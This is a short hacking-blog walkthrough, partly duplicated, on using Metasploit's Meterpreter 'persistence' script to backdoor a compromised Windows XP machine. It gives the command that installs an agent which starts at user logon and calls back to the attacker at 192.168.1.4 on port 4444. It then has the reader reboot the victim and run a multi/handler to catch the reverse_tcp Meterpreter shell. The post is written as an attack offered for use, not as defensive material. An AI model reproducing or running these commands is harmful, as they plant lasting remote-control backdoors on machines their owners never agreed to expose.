Megaprimer Service Meterpreter
After performing several times exploitation on windows Xp I found a new way to gain access meterpreter without having to register set value to the backdoor and run multi handler we again get a meterpreter session
Here we have obtained the first meterpreter session:
OS : Kali Linux
-h : for help options
Next :
-U : Automatically start the Agent when the User log on
-i : Interval in second between each connection attemp
-P : port on the remote host where metasploit listening
-r : the IP of the system running Metasploit for the connect back
next step reboot victim machine
finish step run a multi/handler
Please wait a while until we got the meterpreter session =))
very simple right ?
for video, please refer to below
Regards By:
Hidemichi-Hiroyuki a.k.a [H2]
Here we have obtained the first meterpreter session:
OS : Kali Linux
meterpreter > run persistence -h
-h : for help options
Next :
meterpreter > run persistence -U -i 2 -p 4444 -r 192.168.1.4
-U : Automatically start the Agent when the User log on
-i : Interval in second between each connection attemp
-P : port on the remote host where metasploit listening
-r : the IP of the system running Metasploit for the connect back
next step reboot victim machine
meterpreter > reboot
finish step run a multi/handler
#msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 E
Please wait a while until we got the meterpreter session =))
very simple right ?
for video, please refer to below
Regards By:
Hidemichi-Hiroyuki a.k.a [H2]
Comments
Post a Comment
Do Not Fuckin Spamming